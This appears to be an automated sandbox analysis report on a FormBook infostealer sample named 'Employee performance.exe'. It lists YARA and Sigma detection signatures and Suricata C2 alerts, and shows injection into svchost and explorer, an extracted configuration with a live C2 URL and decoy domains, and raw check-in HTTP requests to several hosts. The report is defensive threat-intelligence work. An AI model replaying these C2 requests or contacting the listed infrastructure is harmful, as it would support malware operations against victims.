0.2.Employee performance.exe.15e0000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.Employee performance.exe.15e0000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Employee performance.exe.15e0000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.Employee performance.exe.15e0000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Employee performance.exe", CommandLine: "C:\Users\user\Desktop\Employee performance.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Employee performance.exe", ParentImage: C:\Users\user\Desktop\Employee performance.exe, ParentProcessId: 4944, ParentProcessName: Employee performance.exe, ProcessCommandLine: "C:\Users\user\Desktop\Employee performance.exe", ProcessId: 4132, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\Employee performance.exe", CommandLine: "C:\Users\user\Desktop\Employee performance.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Employee performance.exe", ParentImage: C:\Users\user\Desktop\Employee performance.exe, ParentProcessId: 4944, ParentProcessName: Employee performance.exe, ProcessCommandLine: "C:\Users\user\Desktop\Employee performance.exe", ProcessId: 4132, ProcessName: svchost.exe

Snort Signatures

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 103.224.212.213

Timestamp:	2024-08-05T15:21:45.016591+0200
SID:	2031453
Source Port:	49709
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 91.195.240.19

Timestamp:	2024-08-05T15:24:10.000678+0200
SID:	2031453
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 47.242.64.82

Timestamp:	2024-08-05T15:22:48.422562+0200
SID:	2031453
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 164.90.157.77

Timestamp:	2024-08-05T15:23:07.144896+0200
SID:	2031453
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 23.227.38.74

Timestamp:	2024-08-05T15:21:22.355435+0200
SID:	2031453
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.7 - Destination IP: 162.0.209.131

Timestamp:	2024-08-05T15:24:30.944331+0200
SID:	2031453
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://www.ladonbet.xyz/lm31/www.09gmpvp51.com	Avira URL Cloud: Label: malware
Source: www.ladonbet.xyz/lm31/	Avira URL Cloud: Label: malware
Source: http://www.ladonbet.xyz	Avira URL Cloud: Label: malware
Source: http://www.ladonbet.xyz/lm31/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.ladonbet.xyz/lm31/"], "decoy": ["dr-shahmoradi.com", "mogu.live", "antoni-tapies.com", "fhwz79.com", "worldskillscompetition.com", "521b421.com", "jinchenlan.com", "beenprintin.com", "easysnatch.store", "cepatsukses.pro", "yepyepper.com", "privateschoolwichita.com", "vanguardartisan.com", "hbvc.xyz", "17eclbet.com", "loki360store.com", "greatfinland.com", "pranaimed.com", "20587.asia", "stelariptv.com", "malarosa.com", "momsfreedomfund.com", "hhkpay.com", "inventariarte.com", "mcgregur.xyz", "fibromyalgia-78113.bond", "greate-electronics.com", "k5h2o.top", "sunandmoonksa.com", "cms-software.shop", "kovacsking.shop", "keluargasabang.com", "donerightconcreting.com", "klikslotasia.site", "cheapoakleys-jp.com", "mchlive.com", "58644.xyz", "rtpgacordewa288.com", "dutyanddapper.com", "epostnewmtoken3.site", "delkhah-shop.com", "izziepay.com", "la-lljs.com", "avf2q6n.xyz", "09gmpvp51.com", "studiolab-design.com", "simhabet.live", "itsriskguardian.com", "pisangbetjuara.com", "onlyfitzzh.com", "web3fund.xyz", "hotelsanmartino.com", "xn--4oq20hs9irtk.icu", "nw27d.top", "supapet.shop", "sheenoo.com", "shabaguanfang.com", "webxwhiz.com", "sweatxin.com", "luxedecorgoods.com", "warpateam.com", "qik4eh.com", "311344.club", "blacktripadvisors.com"]}

Multi AV Scanner detection for submitted file

Source: Employee performance.exe	ReversingLabs: Detection: 65%
Source: Employee performance.exe	Virustotal: Detection: 66%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Employee performance.exe.15e0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1314204133.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1261513480.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3726807576.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3721628123.0000000003440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314573089.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3718436454.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1314603915.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Employee performance.exe

Joe Sandbox ML: detected

Source: Employee performance.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: Employee performance.exe, 00000000.00000003.1242557919.0000000004030000.00000004.00001000.00020000.00000000.sdmp, Employee performance.exe, 00000000.00000003.1248529993.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1259397461.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1249766090.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.0000000003500000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000A.00000003.1316733033.00000000050CB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000003.1314684479.0000000004F13000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.0000000005280000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.000000000541E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: svchost.exe, 00000002.00000003.1314068152.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313976409.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, control.exe, control.exe, 0000000A.00000002.3716428734.0000000000900000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Employee performance.exe, 00000000.00000003.1242557919.0000000004030000.00000004.00001000.00020000.00000000.sdmp, Employee performance.exe, 00000000.00000003.1248529993.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1259397461.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1249766090.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1314965946.0000000003500000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 0000000A.00000003.1316733033.00000000050CB000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000003.1314684479.0000000004F13000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.0000000005280000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3731557006.000000000541E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: svchost.exe, 00000002.00000003.1314068152.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1313976409.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3716428734.0000000000900000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3741355604.000000001105F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000A.00000002.3723389125.000000000348C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3732186608.00000000057CF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3741355604.000000001105F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000A.00000002.3723389125.000000000348C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000A.00000002.3732186608.00000000057CF000.00000004.10000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0103DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0103DBBE
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0100C2A2 FindFirstFileExW,	0_2_0100C2A2
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0104698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0104698F
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_010468EE FindFirstFileW,FindClose,	0_2_010468EE
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0103D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0103D076
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0103D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0103D3A9
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_0104979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0104979D
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01049642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_01049642
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01049B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_01049B2B
Source: C:\Users\user\Desktop\Employee performance.exe	Code function: 0_2_01045C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_01045C97

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 103.224.212.213 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.227.38.74 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 47.242.64.82 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.0.209.131 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 164.90.157.77 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.ladonbet.xyz/lm31/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.ladonbet.xyz

Source: global traffic	HTTP traffic detected: GET /lm31/?vN=I0D4IvR&IR-4WR=3v9Mk5D4UG1ohOatnU60InV+BzHoz0n3lpHv5U7ut2amd93313AWpc+Mp9wa3RzchSXkA2ty2w== HTTP/1.1Host: www.loki360store.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR HTTP/1.1Host: www.warpateam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?vN=I0D4IvR&IR-4WR=FoA+CglQbpkHnr+s7aBTRxGJK1Wdi0lwi/HX1clno50Ms2pZyKjp81NiBNziFvW0ERkZpCilTw== HTTP/1.1Host: www.greate-electronics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?IR-4WR=QbCUt2+YIZlz+dwxAAtvOjK27in0zgvhNSRWcpAaxjKea8/898cVmCp5yUX+CKoU4c8tg+UM8w==&vN=I0D4IvR HTTP/1.1Host: www.antoni-tapies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?vN=I0D4IvR&IR-4WR=FBWSmpNgcXV4Z7KuJkJmdDxUaYIsSjlTtHPGPH3H6ne0varfGF0HjaluKEQFNPCXvpsJxm6uZg== HTTP/1.1Host: www.17eclbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?IR-4WR=ouOH1iLlZSoKQO8ZGquF9b4n2bh5CptaW8ZUOykV+DLPuA7sqI/QypE0IRpCwT+0rd/MZIKfKw==&vN=I0D4IvR HTTP/1.1Host: www.webxwhiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 103.224.212.213 103.224.212.213
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Employee performance.exe

Code function: 0_2_0104CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,

0_2_0104CF1A

Source: global traffic	HTTP traffic detected: GET /lm31/?vN=I0D4IvR&IR-4WR=3v9Mk5D4UG1ohOatnU60InV+BzHoz0n3lpHv5U7ut2amd93313AWpc+Mp9wa3RzchSXkA2ty2w== HTTP/1.1Host: www.loki360store.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?IR-4WR=je5vN1uA9yEmYEN49dayIwTCku09UgHsksm87SEwvw14I11Hwk0s9tmois1WiUPsr2unY/WNgA==&vN=I0D4IvR HTTP/1.1Host: www.warpateam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?vN=I0D4IvR&IR-4WR=FoA+CglQbpkHnr+s7aBTRxGJK1Wdi0lwi/HX1clno50Ms2pZyKjp81NiBNziFvW0ERkZpCilTw== HTTP/1.1Host: www.greate-electronics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?IR-4WR=QbCUt2+YIZlz+dwxAAtvOjK27in0zgvhNSRWcpAaxjKea8/898cVmCp5yUX+CKoU4c8tg+UM8w==&vN=I0D4IvR HTTP/1.1Host: www.antoni-tapies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?vN=I0D4IvR&IR-4WR=FBWSmpNgcXV4Z7KuJkJmdDxUaYIsSjlTtHPGPH3H6ne0varfGF0HjaluKEQFNPCXvpsJxm6uZg== HTTP/1.1Host: www.17eclbet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /lm31/?IR-4WR=ouOH1iLlZSoKQO8ZGquF9b4n2bh5CptaW8ZUOykV+DLPuA7sqI/QypE0IRpCwT+0rd/MZIKfKw==&vN=I0D4IvR HTTP/1.1Host: www.webxwhiz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.loki360store.com
Source: global traffic	DNS traffic detected: DNS query: www.warpateam.com
Source: global traffic	DNS traffic detected: DNS query: www.ladonbet.xyz
Source: global traffic	DNS traffic detected: DNS query: www.09gmpvp51.com
Source: global traffic	DNS traffic detected: DNS query: www.greate-electronics.com
Source: global traffic	DNS traffic detected: DNS query: www.antoni-tapies.com
Source: global traffic	DNS traffic detected: DNS query: www.sweatxin.com
Source: global traffic	DNS traffic detected: DNS query: www.17eclbet.com
Source: global traffic	DNS traffic detected: DNS query: www.webxwhiz.com
Source: global traffic	DNS traffic detected: DNS query: www.kovacsking.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Aug 2024 13:21:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Aug 2024 13:21:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CkPLM%2BlWm21KCRTg6sIdxEcq%2F0L%2FYZCIpwZOq%2Fhi839H7mP7MgndG8YtdpJUhPSWNIbHak7Sl%2F%2FikqAFQp9txf8WxxGZZmv%2F0PJeS9xwoF48TuXplxsN9NpNVQY0F3w0VRzWZBcf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=9.999752X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8ae717025e1743c8-EWRalt-svc: h3=":443"; ma=86400Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 Data Ascii: <!DOCTYPE html> <html class="no-js" lang="en-US"> <head><title>Attention Required! | Cloudflare</tit

Source: explorer.exe, 00000003.00000002.3736285143.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077383719.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3734004619.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000003.00000002.3736285143.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077383719.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3734004619.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000003.00000002.3736285143.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077383719.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3734004619.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000003.00000002.3736285143.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1268404306.0000000008F7B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272651654.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2274623728.0000000008F7A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3077383719.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3734004619.000000000730B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000003.00000002.3733334301.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1265667852.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000003.00000002.3734565335.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740167000.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073650707.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267898832.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3735244831.0000000008820000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740167000.000000000C510000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3073650707.000000000C510000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.09gmpvp51.com
Source: explorer.exe, 00000003.00000003.2271441947.000000000C51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2271187657.000000000C4F4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2272489607.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3740247693.000000000C525000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3076165804.000000000C5AF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.09gmpvp51.com/lm31/
